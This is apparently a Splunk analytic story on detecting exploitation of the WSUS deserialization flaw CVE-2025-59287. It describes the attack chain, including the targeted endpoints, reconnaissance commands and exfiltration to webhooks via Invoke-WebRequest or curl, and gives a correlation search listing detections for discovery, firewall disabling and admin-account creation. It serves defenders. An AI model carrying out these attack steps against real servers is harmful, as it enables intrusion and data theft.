Analytics Story: Microsoft WSUS CVE-2025-59287
Description
This analytic story addresses the exploitation of CVE-2025-59287, a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS). Threat actors exploit a deserialization vulnerability in the WSUS AuthorizationCookie to achieve unauthenticated remote code execution on exposed WSUS servers. The attack leverages publicly accessible WSUS instances on default ports 8530/TCP (HTTP) and 8531/TCP (HTTPS) to send specially crafted POST requests that trigger deserialization attacks, resulting in shell spawning from the WSUS service and IIS worker processes.
Why it matters
On October 23, 2025, Microsoft released an out-of-band security update for CVE-2025-59287, a critical deserialization vulnerability affecting Windows Server Update Services (WSUS). Security researchers at Huntress observed active exploitation starting around October 23, 2025 at 23:34 UTC, where threat actors targeted WSUS instances exposed to the internet on their default ports. The attack chain begins with the adversary sending multiple specially crafted HTTP POST requests to WSUS web service endpoints including /SimpleAuthWebService/SimpleAuth.asmx, /ClientWebService/Client.asmx, and /ReportingWebService/ReportingWebService.asmx. These requests exploit the deserialization vulnerability in the AuthorizationCookie parameter, allowing attackers to achieve unauthenticated remote code execution. Upon successful exploitation, the attack manifests in two distinct process execution chains - wsusservice.exe spawning cmd.exe which subsequently spawns PowerShell, and w3wp.exe (IIS worker process) following a similar pattern. The malicious PowerShell payload, delivered in base64-encoded format using the -ec parameter, executes reconnaissance commands including whoami, net user /domain for Active Directory enumeration, and ipconfig /all for network configuration discovery. The collected data is then exfiltrated to remote webhook services using either PowerShell's Invoke-WebRequest cmdlet with the PUT method or curl.exe with the --data-binary flag. Attackers have been observed using proxy networks to obfuscate their source infrastructure during exploitation attempts. Organizations should immediately apply Microsoft's security update, isolate WSUS servers from direct internet access, and restrict inbound traffic on ports 8530 and 8531 to only authorized management hosts and Microsoft Update servers.
Correlation Search
Windows Common Abused Cmd Shell Risk Behavior
1| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where source IN ("*Windows Cmdline Tool Execution From Non-Shell Process*", "*Windows System Network Config Discovery Display DNS*", "*Local Account Discovery With Wmic*", "*Windows Group Discovery Via Net*", "*Windows Create Local Administrator Account Via Net*", "*Windows User Discovery Via Net*", "*Icacls Deny Command*", "*ICACLS Grant Command*", "*Windows Proxy Via Netsh*", "*Processes launching netsh*", "*Disabling Firewall with Netsh*", "*Windows System Network Connections Discovery Netsh*", "*Network Connection Discovery With Arp*", "*Windows System Discovery Using ldap Nslookup*", "*Windows System Shutdown CommandLine*") by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `windows_common_abused_cmd_shell_risk_behavior_filter`
Detections
Data Sources
| Name | Platform | Sourcetype | Source |
|---|---|---|---|
| Cisco Network Visibility Module Flow Data |  Network |
cisco:nvm:flowdata |
not_applicable |
| CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor |
crowdstrike |
| Powershell Script Block Logging 4104 |  Windows |
XmlWinEventLog |
XmlWinEventLog:Microsoft-Windows-PowerShell/Operational |
| Sysmon EventID 1 | Windows |
XmlWinEventLog |
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon for Linux EventID 1 |  Linux |
sysmon:linux |
Syslog:Linux-Sysmon/Operational |
| Windows Event Log Security 4688 | Windows |
XmlWinEventLog |
XmlWinEventLog:Security |
References
- https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287
- https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
Source: GitHub | Version: 1